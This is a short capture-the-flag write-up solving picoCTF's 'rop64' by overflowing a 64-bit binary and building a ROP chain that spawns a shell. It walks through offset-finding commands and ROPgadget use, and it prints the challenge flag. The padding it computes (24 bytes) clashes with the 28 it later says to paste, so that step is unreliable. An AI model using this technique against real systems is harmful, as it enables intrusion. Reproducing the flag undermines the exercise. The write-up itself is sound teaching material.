Comment on page

rop64

Problem

Time for the classic ROP in 64-bit. Can you exploit this program to get a flag? You can find the program in /problems/rop64_0_4c66bec7dba72276ffa01e0ad2d6ec8f on the shell server. Source.

Solution

  1. 1.
    Get Padding
    1. 1.
      Run python2 -c "from pwn import *; print cyclic(1000, n=8)" > fuzz.in
    2. 2.
      Start program in gdb (preferably with pwndbg extension) and run r < fuzz.in to start then x $rbp to get 0x6161616161616163: Cannot access memory at address 0x6161616161616163
    3. 3.
      Run python2 -c "from pwn import *; print cyclic_find(0x6161616161616163, n=8)" to get padding of 16
    4. 4.
      Add 8 to padding because right after 16 is the "saved frame/base pointer" (which is 8 bytes because 64 bit program) and we want to modify the "saved return address" which is the next address in the stack. (More Info)
    5. 5.
      So padding is 'a'*(16+8)
  2. 2.
    Use ROPgadget to run python ROPgadget.py --binary ./vuln --rop --badbytes "0a" to get ROP chain
  3. 3.
    Paste in padding of 'a'*28
  4. 4.
    Run script.py for remote execution
  5. 5.
    Run cat flag.txt in the shell that spawns

Flag

picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}
Last modified 2yr ago